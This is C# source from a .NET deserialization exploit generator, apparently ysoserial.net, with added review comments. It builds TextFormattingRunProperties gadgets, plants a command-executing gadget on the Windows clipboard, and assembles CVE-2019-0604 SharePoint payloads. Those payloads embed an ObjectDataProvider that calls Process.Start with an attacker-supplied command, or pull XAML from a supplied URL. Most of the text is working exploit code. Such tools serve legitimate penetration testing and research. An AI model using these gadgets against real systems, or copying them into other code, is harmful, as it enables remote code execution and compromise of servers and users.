        /// <summary>
        /// Local test harness: generates the TextFormattingRunProperties gadget via the
        /// "binaryformatter" formatter, converts the stream to JSON, runs the JSON minifier,
        /// and prints the byte length before and after. Console-only; nothing is returned.
        /// The method blocks on <see cref="Console.ReadLine"/> before returning.
        /// </summary>
        private void TextFormatterMinifying()
        {
            string myApp = "TestConsoleApp_YSONET";

            // sampleInputArgs is not declared here — presumably a field of the enclosing class
            // (assigned, never read locally). The positional InputArgs ctor arguments are not
            // visible on this page; confirm their meaning against InputArgs before reusing.
            sampleInputArgs = new InputArgs(myApp + " /foo bar", true, false, true, true, true, null);
            // Passed through to MinimiseJsonAndRun; its exact effect lives in BinaryFormatterMinifier.
            bool isErrOk = false;

            TextFormattingRunPropertiesGenerator generator = new TextFormattingRunPropertiesGenerator();

            // GenerateWithNoTest returns object; the BinaryFormatter path is expected to yield byte[].
            byte[] tcd_bf_byte = (byte[])generator.GenerateWithNoTest("binaryformatter", sampleInputArgs);
            Console.WriteLine("Init size: " + tcd_bf_byte.Length);
            string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte), false, true, true);

            string result = BinaryFormatterMinifier.MinimiseJsonAndRun(json_string, sampleInputArgs, isErrOk, true);

            Console.WriteLine(result);
            // Round-trip the minified JSON back to a stream only to measure its length.
            // Neither MemoryStream is disposed; harmless for in-memory buffers in a harness.
            MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(result);

            Console.WriteLine("Final size: " + ms.Length);
            Console.ReadLine();
        }
        /// <summary>
        /// Plugin entry point. Parses the plugin options, builds a TextFormattingRunProperties
        /// gadget wrapped in <c>AxHostStateMarshal</c>, and places it on the system clipboard
        /// as a <see cref="System.Windows.Forms.DataObject"/> under <c>format</c>.
        /// All clipboard work runs on a dedicated STA thread because OLE clipboard calls
        /// require STA and <c>[STAThread]</c> cannot be applied outside the plugin.
        /// </summary>
        /// <param name="args">Raw plugin arguments; parsed with the <c>options</c> set.</param>
        /// <returns>A fixed status string once the STA thread has finished.</returns>
        /// <remarks>
        /// Option-parse failures and a missing <c>command</c> call
        /// <see cref="System.Environment.Exit(int)"/> from inside the worker thread, which
        /// terminates the whole process rather than just this plugin.
        /// </remarks>
        public object Run(string[] args)
        {
            // to solve this error: Current thread must be set to single thread apartment (STA) mode before OLE calls can be made
            // we cannot use the [STAThread] outside of this plugin
            // here is a solution
            var staThread = new Thread(delegate()
            {
                InputArgs inputArgs = new InputArgs();
                List <string> extra;
                try
                {
                    // `extra` receives non-option arguments but is never read afterwards.
                    extra                   = options.Parse(args);
                    inputArgs.Cmd           = command;
                    inputArgs.Minify        = minify;
                    inputArgs.UseSimpleType = useSimpleType;
                    inputArgs.Test          = test;
                }
                catch (OptionException e)
                {
                    Console.Write("ysoserial: ");
                    Console.WriteLine(e.Message);
                    Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                    System.Environment.Exit(-1);
                }

                // Assigned but never used; the marshalled object below is built directly.
                object payload = "";
                // IsNullOrWhiteSpace already covers the IsNullOrEmpty case; the double check is redundant.
                if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
                {
                    Console.Write("ysoserial: ");
                    Console.WriteLine("Incorrect plugin mode/arguments combination");
                    Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                    System.Environment.Exit(-1);
                }

                // Creates a new data object.
                System.Windows.Forms.DataObject myDataObject = new System.Windows.Forms.DataObject();

                // The gadget is stored under `format` with autoConvert = false; the reader
                // that triggers it is whatever later calls GetData(format) on the clipboard.
                myDataObject.SetData(format, false, new AxHostStateMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs))); // for System.Windows.Forms

                /*
                 * myDataObject.SetData(format, new DataSetMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)), false); // for System.Windows
                 */

                // Replaces whatever the user had on the clipboard. The `true` (copy) argument
                // asks the clipboard to keep the data after this process exits.
                Clipboard.Clear();
                Clipboard.SetDataObject(myDataObject, true);

                if (test)
                {
                    // PoC on how it works in practice
                    try
                    {
                        IDataObject dataObj = Clipboard.GetDataObject();
                        // NOTE(review): this local `test` shadows the `test` option field used in
                        // the enclosing `if (test)` — rename (e.g. readBack) to avoid confusion.
                        Object test         = dataObj.GetData(format);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                }
            });

            staThread.SetApartmentState(ApartmentState.STA);
            staThread.Start();
            // Block until the clipboard work (and any test read-back) has completed.
            staThread.Join();

            return("Object copied to the clipboard");
        }
        /// <summary>
        /// Builds the encoded string for the CVE_2019_0604 generator. Two payload variants are
        /// produced depending on the <c>useurl</c> field: a TextFormattingRunProperties gadget
        /// serialized with DataContractSerializer (XAML fetched from <c>cmd</c> as a URL), or an
        /// inline ExpandedWrapper/XamlReader/ObjectDataProvider XML with <c>cmd</c> split into
        /// Process.Start arguments. The XML is minified, echoed to the console, then hex-encoded.
        /// </summary>
        /// <returns>
        /// <c>"__bp"</c> followed by the hex encoding of <c>(char)(payload.Length &lt;&lt; 2)</c>
        /// and then the hex encoding of the payload itself.
        /// </returns>
        /// <remarks>
        /// Defensive note: the observable artifact of this output is the literal <c>__bp</c>
        /// prefix followed by a hex-encoded assembly-qualified type name
        /// (<c>System.Data.Services.Internal.ExpandedWrapper`2</c> or
        /// <c>TextFormattingRunProperties</c>). Fields <c>useurl</c> and <c>cmd</c> and the
        /// helper <c>HexEncode</c> are defined outside this method.
        /// </remarks>
        public string CVE_2019_0604()
        {
            /*
             * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
             * <ExpandedElement/>
             * <ProjectedProperty0>
             * <MethodName>Parse</MethodName>
             * <MethodParameters>
             *  <anyType xsi:type=""xsd:string"">
             *      <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
             *  </anyType>
             * </MethodParameters>
             * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
             * </ProjectedProperty0>
             * </ExpandedWrapperOfXamlReaderObjectDataProvider>";
             * //*/

            // payloadPart1 is the assembly-qualified type-name prefix (ends with ':'),
            // payloadPart2 the serialized object body that follows it.
            string payloadPart1 = "";
            string payloadPart2 = "";

            if (useurl)
            {
                // URL variant: delegate to the TextFormattingRunProperties generator with a
                // dummy Cmd; the real input is passed as --xamlurl via ExtraInternalArguments.
                InputArgs inputArgs = new InputArgs();
                inputArgs.Cmd      = "foobar";
                inputArgs.IsRawCmd = true;
                inputArgs.ExtraInternalArguments = new List <String> {
                    "--variant", "3", "--xamlurl", cmd
                };
                inputArgs.Minify        = true;
                inputArgs.UseSimpleType = true;

                // Spaces are stripped from the type name to shorten the final encoded string.
                payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":";
                payloadPart1 = payloadPart1.Replace(" ", "");
                TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator();
                payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs);
            }
            else
            {
                // Inline variant: hard-coded ExpandedWrapper`2 type name pinned to PresentationFramework 4.0.0.0.
                payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";

                // CommandArgSplitter is the only treatment cmd receives before being interpolated
                // into the XML below; any XML escaping has to happen there (not visible here).
                Boolean  hasArgs;
                string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);

                String cmdPart;

                // hasArgs == true means splittedCMD has at least two entries (program + arguments).
                if (hasArgs)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
                }

                payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
            }
            //payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding

            // Hex encoding doubles the size, so the XML is minified first.
            payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true);

            //Console.WriteLine(payloadPart2);
            string payload = payloadPart1 + payloadPart2;

            // The unencoded payload is echoed to stdout as a side effect.
            Console.WriteLine(payload);
            StringBuilder stringBuilder = new StringBuilder();

            // Length header: payload.Length << 2 narrowed to a single char. The `checked` cast
            // throws OverflowException once the shifted length exceeds the char range (0xFFFF),
            // i.e. for payloads longer than 16383 characters.
            stringBuilder.Append("__bp");
            HexEncode(checked ((char)(payload.Length << 2)), stringBuilder);
            HexEncode(payload, stringBuilder);

            return(stringBuilder.ToString());
        }